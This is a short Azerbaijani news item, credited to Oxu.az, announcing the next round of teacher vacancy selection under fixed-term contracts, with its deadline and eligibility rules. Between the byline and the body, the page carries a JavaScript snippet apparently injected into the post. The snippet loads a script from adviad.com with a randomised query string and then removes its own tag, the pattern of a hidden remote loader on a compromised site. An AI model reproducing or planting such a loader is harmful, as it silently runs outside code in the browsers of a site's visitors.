Müəllimlərin müddətli müqavilə ilə növbəti vakansiya seçimi başladı

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Bu gündən etibarən ümumi təhsil müəssisələrinə müddətli müqavilə ilə müəllimlərin işə qəbulu üzrə müsabiqənin növbəti vakansiya seçimi başlanır.

Təhsil İnstitutunun İnsan Resursları Mərkəzindən verilən məlumata görə, vakansiya seçimi sentyabrın 19-u saat 11:00-dək davam edəcək. Müddətli müqavilə ilə işə qəbul üçün vakansiya seçimi zamanı namizədlər dörd vakant yer seçə bilərlər.

Vakansiya seçimində iştirak etmək istəyən namizədlər şəxsi səhifələrinə daxil olaraq vakant yer seçməli və elektron ərizələrini təsdiq etməlidirlər.

Xatırladaq ki, vakansiya seçimində müsabiqənin test imtahanı mərhələsində 40 və daha yüksək bal toplamış namizədlərin iştirak hüququ var.

Oxu.az

Bu yazılara da göz atın...